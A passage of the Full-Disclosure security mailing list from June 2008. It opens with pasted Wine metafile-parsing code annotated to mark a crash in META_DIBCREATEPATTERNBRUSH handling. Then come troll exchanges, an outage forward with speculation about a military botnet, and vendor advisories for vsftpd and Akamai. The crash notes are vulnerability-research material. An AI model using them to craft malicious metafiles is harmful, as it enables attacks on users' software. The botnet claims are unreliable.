META_POLYLINE: if ((pt = convert_points( mr->rdParm[0], (LPPOINT16)(mr->rdParm + 1)))) { Polyline( hdc, pt, mr->rdParm[0] ); HeapFree( GetProcessHeap(), 0, pt ); } break; case META_RESTOREDC: RestoreDC(hdc, (SHORT)mr->rdParm[0]); break; case META_SELECTOBJECT: SelectObject(hdc, *(ht->objectHandle + mr->rdParm[0])); break; case META_CHORD: Chord(hdc, (SHORT)mr->rdParm[7], (SHORT)mr->rdParm[6], (SHORT)mr->rdParm[5], (SHORT)mr->rdParm[4], (SHORT)mr->rdParm[3], (SHORT)mr->rdParm[2], (SHORT)mr->rdParm[1], (SHORT)mr->rdParm[0]); break; case META_CREATEPATTERNBRUSH: switch (mr->rdParm[0]) { case BS_PATTERN: infohdr = (BITMAPINFOHEADER *)(mr->rdParm + 2); MF_AddHandle(ht, handles, CreatePatternBrush(CreateBitmap(infohdr->biWidth, infohdr->biHeight, infohdr->biPlanes, infohdr->biBitCount, (LPSTR)(mr->rdParm + (sizeof(BITMAPINFOHEADER) / 2) + 4)))); break; case BS_DIBPATTERN: infohdr = (BITMAPINFOHEADER *)(mr->rdParm + 2); MF_AddHandle(ht, handles, CreateDIBPatternBrushPt( infohdr, mr->rdParm[1] )); break; default: ERR("META_CREATEPATTERNBRUSH: Unknown pattern type %d\n", mr->rdParm[0]); break; } break; case META_CREATEPENINDIRECT: { LOGPEN pen; pen.lopnStyle = mr->rdParm[0]; pen.lopnWidth.x = (SHORT)mr->rdParm[1]; pen.lopnWidth.y = (SHORT)mr->rdParm[2]; pen.lopnColor = MAKELONG( mr->rdParm[3], mr->rdParm[4] ); MF_AddHandle(ht, handles, CreatePenIndirect( &pen )); } break; case META_CREATEFONTINDIRECT: { LOGFONTA font; font.lfHeight = (SHORT)mr->rdParm[0]; font.lfWidth = (SHORT)mr->rdParm[1]; font.lfEscapement = (SHORT)mr->rdParm[2]; font.lfOrientation = (SHORT)mr->rdParm[3]; font.lfWeight = (SHORT)mr->rdParm[4]; font.lfItalic = LOBYTE(mr->rdParm[5]); font.lfUnderline = HIBYTE(mr->rdParm[5]); font.lfStrikeOut = LOBYTE(mr->rdParm[6]); font.lfCharSet = HIBYTE(mr->rdParm[6]); font.lfOutPrecision = LOBYTE(mr->rdParm[7]); font.lfClipPrecision = HIBYTE(mr->rdParm[7]); font.lfQuality = LOBYTE(mr->rdParm[8]); font.lfPitchAndFamily = HIBYTE(mr->rdParm[8]); memcpy( font.lfFaceName, mr->rdParm + 9, LF_FACESIZE ); MF_AddHandle(ht, handles, CreateFontIndirectA( &font )); } break; case META_CREATEBRUSHINDIRECT: { LOGBRUSH brush; brush.lbStyle = mr->rdParm[0]; brush.lbColor = MAKELONG( mr->rdParm[1], mr->rdParm[2] ); brush.lbHatch = mr->rdParm[3]; MF_AddHandle(ht, handles, CreateBrushIndirect( &brush )); } break; case META_CREATEPALETTE: MF_AddHandle(ht, handles, CreatePalette((LPLOGPALETTE)mr->rdParm)); break; case META_SETTEXTALIGN: SetTextAlign(hdc, mr->rdParm[0]); break; case META_SELECTPALETTE: GDISelectPalette(hdc, *(ht->objectHandle + mr->rdParm[1]), mr->rdParm[0]); break; case META_SETMAPPERFLAGS: SetMapperFlags(hdc, MAKELONG(mr->rdParm[0],mr->rdParm[1])); break; case META_REALIZEPALETTE: GDIRealizePalette(hdc); break; case META_ESCAPE: Escape(hdc, mr->rdParm[0], mr->rdParm[1], (LPCSTR)&mr->rdParm[2], NULL); break; case META_EXTTEXTOUT: MF_Play_MetaExtTextOut( hdc, mr ); break; case META_STRETCHDIB: { LPBITMAPINFO info = (LPBITMAPINFO) &(mr->rdParm[11]); LPSTR bits = (LPSTR)info + DIB_BitmapInfoSize( info, mr->rdParm[2] ); StretchDIBits( hdc, (SHORT)mr->rdParm[10], (SHORT)mr->rdParm[9], (SHORT)mr->rdParm[8], (SHORT)mr->rdParm[7], (SHORT)mr->rdParm[6], (SHORT)mr->rdParm[5], (SHORT)mr->rdParm[4], (SHORT)mr->rdParm[3], bits, info, mr->rdParm[2],MAKELONG(mr->rdParm[0],mr->rdParm[1])); } break; case META_DIBSTRETCHBLT: { LPBITMAPINFO info = (LPBITMAPINFO) &(mr->rdParm[10]); LPSTR bits = (LPSTR)info + DIB_BitmapInfoSize( info, mr->rdParm[2] ); StretchDIBits( hdc, (SHORT)mr->rdParm[9], (SHORT)mr->rdParm[8], (SHORT)mr->rdParm[7], (SHORT)mr->rdParm[6], (SHORT)mr->rdParm[5], (SHORT)mr->rdParm[4], (SHORT)mr->rdParm[3], (SHORT)mr->rdParm[2], bits, info, DIB_RGB_COLORS,MAKELONG(mr->rdParm[0],mr->rdParm[1])); } break; case META_STRETCHBLT: { HDC hdcSrc = CreateCompatibleDC(hdc); HBITMAP hbitmap = CreateBitmap(mr->rdParm[10], /*Width */ mr->rdParm[11], /*Height*/ mr->rdParm[13], /*Planes*/ mr->rdParm[14], /*BitsPixel*/ (LPSTR)&mr->rdParm[15]); /*bits*/ SelectObject(hdcSrc,hbitmap); StretchBlt(hdc, (SHORT)mr->rdParm[9], (SHORT)mr->rdParm[8], (SHORT)mr->rdParm[7], (SHORT)mr->rdParm[6], hdcSrc, (SHORT)mr->rdParm[5], (SHORT)mr->rdParm[4], (SHORT)mr->rdParm[3], (SHORT)mr->rdParm[2], MAKELONG(mr->rdParm[0],mr->rdParm[1])); DeleteDC(hdcSrc); } break; case META_BITBLT: { HDC hdcSrc = CreateCompatibleDC(hdc); HBITMAP hbitmap = CreateBitmap(mr->rdParm[7]/*Width */, mr->rdParm[8]/*Height*/, mr->rdParm[10]/*Planes*/, mr->rdParm[11]/*BitsPixel*/, (LPSTR)&mr->rdParm[12]/*bits*/); SelectObject(hdcSrc,hbitmap); BitBlt(hdc,(SHORT)mr->rdParm[6],(SHORT)mr->rdParm[5], (SHORT)mr->rdParm[4],(SHORT)mr->rdParm[3], hdcSrc, (SHORT)mr->rdParm[2],(SHORT)mr->rdParm[1], MAKELONG(0,mr->rdParm[0])); DeleteDC(hdcSrc); } break; case META_CREATEREGION: { HRGN hrgn = CreateRectRgn(0,0,0,0); MF_Play_MetaCreateRegion(mr, hrgn); MF_AddHandle(ht, handles, hrgn); } break; case META_FILLREGION: FillRgn(hdc, *(ht->objectHandle + mr->rdParm[1]), *(ht->objectHandle + mr->rdParm[0])); break; case META_FRAMEREGION: FrameRgn(hdc, *(ht->objectHandle + mr->rdParm[3]), *(ht->objectHandle + mr->rdParm[2]), (SHORT)mr->rdParm[1], (SHORT)mr->rdParm[0]); break; case META_INVERTREGION: InvertRgn(hdc, *(ht->objectHandle + mr->rdParm[0])); break; case META_PAINTREGION: PaintRgn(hdc, *(ht->objectHandle + mr->rdParm[0])); break; case META_SELECTCLIPREGION: SelectClipRgn(hdc, *(ht->objectHandle + mr->rdParm[0])); break; ************************************************************ ~ DEFINE OF WHAT IS '' #define META_DIBCREATEPATTERNBRUSH 0x0142 '' 208 /****************************************************************** 209 * MFDRV_CreateBrushIndirect 210 */ 211 212 INT16 MFDRV_CreateBrushIndirect(PHYSDEV dev, HBRUSH hBrush ) 213 { 214 DWORD size; 215 METARECORD *mr; 216 LOGBRUSH logbrush; 217 METAFILEDRV_PDEVICE *physDev = (METAFILEDRV_PDEVICE *)dev; 218 BOOL r; 219 220 if (!GetObjectA( hBrush, sizeof(logbrush), &logbrush )) return -1; 221 222 switch(logbrush.lbStyle) 223 { 224 case BS_SOLID: 225 case BS_NULL: 226 case BS_HATCHED: 227 { 228 LOGBRUSH16 lb16; 229 230 lb16.lbStyle = logbrush.lbStyle; 231 lb16.lbColor = logbrush.lbColor; 232 lb16.lbHatch = logbrush.lbHatch; 233 size = sizeof(METARECORD) + sizeof(LOGBRUSH16) - 2; 234 mr = HeapAlloc( GetProcessHeap(), 0, size ); 235 mr->rdSize = size / 2; 236 mr->rdFunction = META_CREATEBRUSHINDIRECT; 237 memcpy( mr->rdParm, &lb16, sizeof(LOGBRUSH16)); 238 break; 239 } 240 case BS_PATTERN: ***** SWITCH CASE 241 { 242 BITMAP bm; 243 BITMAPINFO *info; 244 DWORD bmSize; 245 COLORREF cref; 246 247 GetObjectA((HANDLE)logbrush.lbHatch, sizeof(bm), &bm); 248 if(bm.bmBitsPixel != 1 || bm.bmPlanes != 1) { 249 FIXME("Trying to store a colour pattern brush\n"); 250 goto done; 251 } 252 253 bmSize = DIB_GetDIBImageBytes(bm.bmWidth, bm.bmHeight, DIB_PAL_COLORS); 254 255 size = sizeof(METARECORD) + sizeof(WORD) + sizeof(BITMAPINFO) + 256 sizeof(RGBQUAD) + bmSize; 257 258 mr = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, size); 259 if(!mr) goto done; 260 mr->rdFunction = META_DIBCREATEPATTERNBRUSH; **** PARAM 1 261 mr->rdSize = size / 2; 262 mr->rdParm[0] = BS_PATTERN; 263 mr->rdParm[1] = DIB_RGB_COLORS; 264 info = (BITMAPINFO *)(mr->rdParm + 2); 265 266 info->bmiHeader.biSize = sizeof(BITMAPINFOHEADER); 267 info->bmiHeader.biWidth = bm.bmWidth; 268 info->bmiHeader.biHeight = bm.bmHeight; 269 info->bmiHeader.biPlanes = 1; 270 info->bmiHeader.biBitCount = 1; 271 info->bmiHeader.biSizeImage = bmSize; 272 273 GetBitmapBits((HANDLE)logbrush.lbHatch, 274 bm.bmHeight * BITMAP_GetWidthBytes (bm.bmWidth, bm.bmBitsPixel), 275 (LPBYTE)info + sizeof(BITMAPINFO) + sizeof(RGBQUAD)); 276 277 /* Change the padding to be DIB compatible if needed */ 278 if(bm.bmWidth & 31) 279 MFDRV_PadTo32((LPBYTE)info + sizeof(BITMAPINFO) + sizeof(RGBQUAD), 280 bm.bmWidth, bm.bmHeight); 281 /* BMP and DIB have opposite row order conventions */ 282 MFDRV_Reverse((LPBYTE)info + sizeof(BITMAPINFO) + sizeof(RGBQUAD), 283 bm.bmWidth, bm.bmHeight); 284 285 cref = GetTextColor(physDev->hdc); 286 info->bmiColors[0].rgbRed = GetRValue(cref); 287 info->bmiColors[0].rgbGreen = GetGValue(cref); 288 info->bmiColors[0].rgbBlue = GetBValue(cref); 289 info->bmiColors[0].rgbReserved = 0; 290 cref = GetBkColor(physDev->hdc); 291 info->bmiColors[1].rgbRed = GetRValue(cref); 292 info->bmiColors[1].rgbGreen = GetGValue(cref); 293 info->bmiColors[1].rgbBlue = GetBValue(cref); 294 info->bmiColors[1].rgbReserved = 0; 295 break; 296 } 297 298 case BS_DIBPATTERN: 299 { 300 BITMAPINFO *info; 301 DWORD bmSize, biSize; 302 303 info = GlobalLock16((HGLOBAL16)logbrush.lbHatch); 304 if (info->bmiHeader.biCompression) 305 bmSize = info->bmiHeader.biSizeImage; 306 else 307 bmSize = DIB_GetDIBImageBytes(info->bmiHeader.biWidth, 308 info->bmiHeader.biHeight, 309 info->bmiHeader.biBitCount); 310 biSize = bitmap_info_size(info, LOWORD(logbrush.lbColor)); 311 size = sizeof(METARECORD) + biSize + bmSize + 2; 312 mr = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, size); 313 if(!mr) goto done; 314 mr->rdFunction = META_DIBCREATEPATTERNBRUSH; 315 mr->rdSize = size / 2; 316 *(mr->rdParm) = logbrush.lbStyle; 317 *(mr->rdParm + 1) = LOWORD(logbrush.lbColor); 318 memcpy(mr->rdParm + 2, info, biSize + bmSize); 319 break; 320 } 321 default: 322 FIXME("Unkonwn brush style %x\n", logbrush.lbStyle); 323 return 0; 324 } 325 r = MFDRV_WriteRecord( dev, mr, mr->rdSize * 2); 326 HeapFree(GetProcessHeap(), 0, mr); 327 if( !r ) 328 return -1; 329 done: 330 return MFDRV_AddHandle( dev, hBrush ); 331 } ************************************************************ case META_DIBCREATEPATTERNBRUSH: * /* mr->rdParm[0] may be BS_PATTERN or BS_DIBPATTERN: but there's no difference */ MF_AddHandle(ht, handles, *** CRASH FUNCTION *** CreateDIBPatternBrushPt( mr->rdParm + 2, mr->rdParm[1] )); ** break; case META_DIBBITBLT: /* In practice I've found that there are two layouts for META_DIBBITBLT, one (the first here) is the usual one when a src dc is actually passed to it, the second occurs when the src dc is passed in as NULL to the creating BitBlt. As the second case has no dib, a size check will suffice to distinguish. Caolan.McNamara at ul.ie */ if (mr->rdSize > 12) { LPBITMAPINFO info = (LPBITMAPINFO) &(mr->rdParm[8]); LPSTR bits = (LPSTR)info + DIB_BitmapInfoSize(info, mr->rdParm[0]); StretchDIBits(hdc, (SHORT)mr->rdParm[7], (SHORT)mr->rdParm[6], (SHORT)mr->rdParm[5], (SHORT)mr->rdParm[4], (SHORT)mr->rdParm[3], (SHORT)mr->rdParm[2], (SHORT)mr->rdParm[5], (SHORT)mr->rdParm[4], bits, info, DIB_RGB_COLORS, MAKELONG(mr->rdParm[0], mr->rdParm[1])); } else /* equivalent to a PatBlt */ PatBlt(hdc, (SHORT)mr->rdParm[8], (SHORT)mr->rdParm[7], (SHORT)mr->rdParm[6], (SHORT)mr->rdParm[5], MAKELONG(mr->rdParm[0], mr->rdParm[1])); break; case META_SETTEXTCHAREXTRA: SetTextCharacterExtra(hdc, (SHORT)mr->rdParm[0]); break; case META_SETTEXTJUSTIFICATION: SetTextJustification(hdc, (SHORT)mr->rdParm[1], (SHORT)mr->rdParm[0]); break; case META_EXTFLOODFILL: ExtFloodFill(hdc, (SHORT)mr->rdParm[4], (SHORT)mr->rdParm[3], MAKELONG(mr->rdParm[1], mr->rdParm[2]), mr->rdParm[0]); break; case META_SETDIBTODEV: { BITMAPINFO *info = (BITMAPINFO *) &(mr->rdParm[9]); char *bits = (char *)info + DIB_BitmapInfoSize( info, mr->rdParm[0] ); SetDIBitsToDevice(hdc, (SHORT)mr->rdParm[8], (SHORT)mr->rdParm[7], (SHORT)mr->rdParm[6], (SHORT)mr->rdParm[5], (SHORT)mr->rdParm[4], (SHORT)mr->rdParm[3], mr->rdParm[2], mr->rdParm[1], bits, info, mr->rdParm[0]); break; } #define META_UNIMP(x) case x: \ FIXME("PlayMetaFileRecord:record type "#x" not implemented.\n"); \ break; META_UNIMP(META_DRAWTEXT) META_UNIMP(META_ANIMATEPALETTE) META_UNIMP(META_SETPALENTRIES) META_UNIMP(META_RESIZEPALETTE) META_UNIMP(META_RESETDC) META_UNIMP(META_STARTDOC) META_UNIMP(META_STARTPAGE) META_UNIMP(META_ENDPAGE) META_UNIMP(META_ABORTDOC) META_UNIMP(META_ENDDOC) META_UNIMP(META_CREATEBRUSH) META_UNIMP(META_CREATEBITMAPINDIRECT) META_UNIMP(META_CREATEBITMAP) #undef META_UNIMP default: WARN("PlayMetaFileRecord: Unknown record type %x\n", mr->rdFunction); return FALSE; } return TRUE; } * META_DIBCREATEPATTERNBRUSH - IS THiS THE PATTERN BYTE? ** 85 static int MF_AddHandle(HANDLETABLE *ht, UINT htlen, HGDIOBJ hobj) 86 { 87 int i; 88 89 for (i = 0; i < htlen; i++) 90 { 91 if (*(ht->objectHandle + i) == 0) 92 { 93 *(ht->objectHandle + i) = hobj; 94 return i; 95 } 96 } 97 return -1; 98 } PlayMetaFileRecord gdi.dll WTF HAPPEND WITH WINDOWS? PlayMetaFile16 WINE CODE^^ /******************************************************************* * MF_PlayMetaFile * * Helper for PlayMetaFile */ static BOOL MF_PlayMetaFile( HDC hdc, METAHEADER *mh) { METARECORD *mr; HANDLETABLE *ht; unsigned int offset = 0; WORD i; HPEN hPen; HBRUSH hBrush; HFONT hFont; BOOL loaded = FALSE; if (!mh) return FALSE; if(mh->mtType == METAFILE_DISK) { /* Create a memory-based copy */ mh = MF_LoadDiskBasedMetaFile(mh); if(!mh) return FALSE; loaded = TRUE; } /* save the current pen, brush and font */ hPen = GetCurrentObject(hdc, OBJ_PEN); hBrush = GetCurrentObject(hdc, OBJ_BRUSH); hFont = GetCurrentObject(hdc, OBJ_FONT); /* create the handle table */ ht = HeapAlloc( GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(HANDLETABLE) * mh->mtNoObjects); if(!ht) return FALSE; /* loop through metafile playing records */ offset = mh->mtHeaderSize * 2; while (offset < mh->mtSize * 2) { mr = (METARECORD *)((char *)mh + offset); TRACE("offset=%04x,size=%08lx\n", offset, mr->rdSize); if (!mr->rdSize) { TRACE( "Entry got size 0 at offset %d, total mf length is %ld\n", offset,mh->mtSize*2); break; /* would loop endlessly otherwise */ } offset += mr->rdSize * 2; PlayMetaFileRecord( hdc, ht, mr, mh->mtNoObjects ); } Signed, Nikolaos Rangos nikolaos.rangos at nruns.com --- Yours Sincerely, ROOKIE // EMAIL CONCEALED Omni glaubst du des? Die Chinesen RELEASEN deren CODE AUF GOOOOOOGLE (COMPLETE KERNEL DUMPS HEHE)??!?!?!! From xploitable at gmail.com Fri Jun 6 18:03:17 2008 From: xploitable at gmail.com (n3td3v) Date: Fri, 6 Jun 2008 18:03:17 +0100 Subject: [Full-disclosure] [OT] Fwd: Comments on: Phoenix Mars Lander site hacked In-Reply-To: References: Message-ID: <4b6ee9310806061003q2ebda4abqa07dc836c4a08dd3@mail.gmail.com> On Fri, Jun 6, 2008 at 12:10 PM, Andrew Wallace wrote: > This post is made by andrew.awal.wallace at gmail.com, my secret identity > for my serious security researches on the computer for when I research > things at the same time that I am on the computer doing research for > security stuff. > > The questions that I ask and the points that I raise in this email are > due to opinions that I have formed. > > From: n3td3v > Date: Wed, 4 Jun 2008 20:29:05 +0100 >> >> >>I'm not a troll, i'm a serious security researcher. >> >>I was misrepresented in the media by SecurityFocus Robert Lemos who >>ruined my image. >> >>The findings have been post, >> >>http://smear-campaign-against-n3td3v.blogspot.com/2007/12/smear-campaign-against-n3td3v.html > > Yes, n3td3v post that. n3td3v's last three paragraphs at n3td3v's > blogspot are copied below with questions to the n3td3v. > > n3td3v Paragraph 1: This is a long standing issue which will go on for > years until regret is shown by Neal Krawetz and Robert Lemos... n3td3v > is still on Full-Disclosure and will never stop posting, and its none > of both their businesses who I am. > ++Did the long standing issue that will end in regret for Robert Lemos > have to do with what happened to the Robert Lemos website? Did Robert > Lemos learn who the n3td3v is - or is it none of his business? Robert Lemos doesn't give a fuck who I am. I'm a lawful white hat who has broken no laws and I had absolutely nothing to do with his website getting hacked. When are you fools going to realise there is no interest in who n3td3v is, the reason Robert Lemos wrote a news article about me was because it had an interesting focus on keyboard typing forensics, I was just the guinea pig for Neal Krawetz's experiment. > > n3td3v Paragraph 2: n3td3v might be available for a real interview for > a large sum of money, based on facts... otherwise, you're a suckers > and will never know the truth!!! It will forever be your mystery who > is n3td3v!!!! *Evil laughter*. > ++Did n3td3v get that large sum of money? No I haven't been asked for an interview from any journalist, for the simple fact there is no public interest. > ++If yes, then n3td3v might not care about others calling n3td3v a > troll even if n3td3v is in the troll role. I'm not a troll i'm a serious security researcher. > ++If not, then according to n3td3v blogspot all others but n3td3v are > suckers who do not know the secret identity that is n3td3v. > Mwahahahaha (Evil laughter). You have my name, age, sex, location and photo thats something I give out everyday on hooker chat rooms. > > n3td3v Paragraph 3: I'll see you both at the security conferences some > time i'm sure and you can tell me all about your smear campaign(s) and > yellow journalism(s). > ++Did n3td3v get to a security conference? If n3td3v managed to get > to a conference, what did n3td3v do and say to the people that n3td3v > swore would feel regret? I've never been to a security conference and probably never will, everything is available to me already. Going to a security conference isn't mission critical for me to stay in the social cyber security loop. > I am worried about security flaws in the major operating systems like > L1nukz, w1ndoe$ 3ck$pee, 200x, and veeeezthaaa. I use Windows 98. > One day I may upgrade to windows for workgroups when I get another > computer to network together with my first and do MASSIVELY > MULTIPLAYER SECURITY RESEARCH! The only problem I have ever had with > Windows 98 is that it is sometimes difficult to get software to run > like my picasa (with heads photoshopped out), anti-virus (but that is > becuase no anti-virus is needed on this great operating system I am > told that I am covered in pwnsauce but they are only trying to make > the crazy guy, me, angry), and certain other google applications from > that fine company called GOOG which I will one day invest in when I > have made my first million in capital. You will all then fear me then > because I will have made my first million in capital. I know that > none of you have made any money. How could you? I dont like you so > you must not have money. > Random bullshit I don't have a reply for. > > All and more of the best for all of you, > > // A.a.W. > All the best with your misguided belief that people care who I am. n3td3v http://n3td3v.googlepages.com From xploitable at gmail.com Fri Jun 6 19:09:03 2008 From: xploitable at gmail.com (n3td3v) Date: Fri, 6 Jun 2008 19:09:03 +0100 Subject: [Full-disclosure] Fwd: Amazon suffers outage In-Reply-To: <3a166c090806061101o7f99036ay658c295e2ea09acb@mail.gmail.com> References: <3a166c090806061101o7f99036ay658c295e2ea09acb@mail.gmail.com> Message-ID: <4b6ee9310806061109r226d63deh8dbb0d3952812a86@mail.gmail.com> ---------- Forwarded message ---------- From: n3td3v Date: Fri, Jun 6, 2008 at 7:01 PM Subject: Amazon suffers outage To: n3td3v at googlegroups.com Visitors to the site are currently being greeted by an error message. http://news.cnet.com/8301-10784_3-9962010-7.html From xploitable at gmail.com Fri Jun 6 19:56:41 2008 From: xploitable at gmail.com (n3td3v) Date: Fri, 6 Jun 2008 19:56:41 +0100 Subject: [Full-disclosure] Amazon suffers outage In-Reply-To: <4b6ee9310806061109r226d63deh8dbb0d3952812a86@mail.gmail.com> References: <3a166c090806061101o7f99036ay658c295e2ea09acb@mail.gmail.com> <4b6ee9310806061109r226d63deh8dbb0d3952812a86@mail.gmail.com> Message-ID: <4b6ee9310806061156o5a550978t2705041e80a6a27b@mail.gmail.com> On Fri, Jun 6, 2008 at 7:09 PM, n3td3v wrote: > ---------- Forwarded message ---------- > From: n3td3v > Date: Fri, Jun 6, 2008 at 7:01 PM > Subject: Amazon suffers outage > To: n3td3v at googlegroups.com > > > > Visitors to the site are currently being greeted by an error message. > > http://news.cnet.com/8301-10784_3-9962010-7.html > U.S Air Force Cyber testing out their cyber warfare botnet and thought no one would notice? Cyberflexing: A response to Mark Seiden http://lists.grok.org.uk/pipermail/full-disclosure/2008-April/061450.html Pentagon botnet http://lists.grok.org.uk/pipermail/full-disclosure/2008-May/062463.html A cyber human shield? http://lists.grok.org.uk/pipermail/full-disclosure/2008-May/062517.html All the best, n3td3v From announce-noreply at rpath.com Fri Jun 6 02:38:20 2008 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Thu, 05 Jun 2008 21:38:20 -0400 Subject: [Full-disclosure] rPSA-2008-0185-1 vsftpd Message-ID: <4848950c.SS+41ab3D0kBLiSE%announce-noreply@rpath.com> rPath Security Advisory: 2008-0185-1 Published: 2008-06-05 Products: rPath Linux 2 Rating: Minor Exposure Level Classification: Remote Non-deterministic Denial of Service Updated Versions: vsftpd=conary.rpath.com at rpl:2/2.0.6-2-0.1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-2562 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5962 Description: Previous versions of the vsftpd package are vulnerable to a Denial of Service attack in which remote attackers may be able to trigger excessive memory consumption by issuing a large number of commands. vsftpd is not installed by default on rPath Linux 2 systems, and the default vsftpd.conf file provided with vsftpd does not establish a vulnerable configuration; therefore only systems customized to include and reconfigure vsftpd may be vulnerable. http://wiki.rpath.com/Advisories:rPSA-2008-0185 Copyright 2008 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html From security at akamai.com Fri Jun 6 16:04:59 2008 From: security at akamai.com (Akamai Security Team) Date: Fri, 06 Jun 2008 11:04:59 -0400 Subject: [Full-disclosure] Akamai Technologies Security Advisory 2008-0003 (Akamai Client Software) Message-ID: <4849521B.5090609@akamai.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ---------------------------------------------------- Akamai Technologies Security Advisory 2008-0003 * Akamai ID: 2008-0003 * Date: 2008/06/06 * Product Name: Akamai Client Software (formerly Red Swoosh) * Affected Versions: Up to and including 3322 * Fixed Version: 3333 * CVE IDs: CVE-2008-1106 * CVSS Base Score: 5.53 * Product Description: The Akamai Client Software is a software layer that securely stores and transfers files to enhance content delivery. * Vulnerability Description: Akamai has become aware of a security vulnerability within the Akamai Client Software which can be exploited to conduct cross-site request forgery attacks. This vulnerability exists only in the Akamai Client Software and does not affect Akamai's other services in any way. Akamai has no evidence to date that any attempt has been made to exploit this vulnerability. * Patch Instructions: No user interaction is required. Clients will be automatically upgraded. * Credit: CVE-2008-1106 was independently discovered and brought to Akamai's attention by Dyon Balding of Secunia Research. * About Akamai: Akamai(r) is the leading global service provider for accelerating content and business processes online. Thousands of organizations have formed trusted relationships with Akamai, improving their revenue and reducing costs by maximizing the performance of their online businesses. Leveraging the Akamai EdgePlatform, these organizations gain business advantage today, and have the foundation for the emerging Web solutions of tomorrow. Akamai is "The Trusted Choice for Online Business." For more information, visit www.akamai.com. Our GPG public key: http://www.akamai.com/dl/akamai/Akamai_Security_General.pub -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (Darwin) iQIcBAEBAgAGBQJISVIbAAoJEEngXEVbkoPOqpMP/ifrjjCTc+M4L2Hy/1OMvKa+ 1tpO24oinIWw1q8NSiHjzLt81Qkv7Yd/Whp/439c8p5W+0EpU/h/0L8dF44Au6IE KV2YaidiG0w+TiBPtkn1AhPHanKGuv5q1z1T/Ud5Y0Nh+Ph0RxoKKtB+MCJT5C62 jD3p6Vi10cVV57AbayyOGxqkJB2dem/qkGWtq/Ck1lzYRwBI3UDd59Y4U1b2NJdL UF+W6rtMqLcWXCd8/OowEFrhMX4Ipaow1AeEaPkpIrp/75h9caq+7gop3QWtb7S9 zxaC+bAMuI+fQbmU5S09kQNycWQEGnXvhUqgiD2pPAV5S0gMxwcRaFbx98YCQb1Y ePgDGMrIPI9Toy9QTuUGf2eb4s8/0upu0EF1T1iI6xETiMpOhbTh/oYjhrnadT7M wJFgbeXVYSyWVZf7+CmCsXVOpinkAKMuZWDIRiHDRm5p7RicYQqHo7h3rZ1Jvw5k qmN67SqUlu6uw9mNd9aR1ysdFxLf8GXKl5qIqyJNQgNJ9kr709zXnp8Bxuq4UPIK 0iPgKvmuHYZLGrM1ZXf8AQpska/qzix7Z58fxLXYAcT261yWQMadXWzKPOrlyk1f QPbAQ3v6C7kMGUOtXV5g8TM0e8iQyTsLRoi6eDmM7Q3rKdFa7H9ZXiRokgLzg2Hy uLS+FsUucKIMGvHpbC/e =nm3S -----END PGP SIGNATURE----- From remove-vuln at secunia.com Fri Jun 6 16:22:27 2008 From: remove-vuln at secunia.com (Secunia Research) Date: Fri, 6 Jun 2008 17:22:27 +0200 Subject: [Full-disclosure] Secunia Research: Akamai Red Swoosh Cross-Site Request Forgery Message-ID: <200806061522.m56FMRKc0208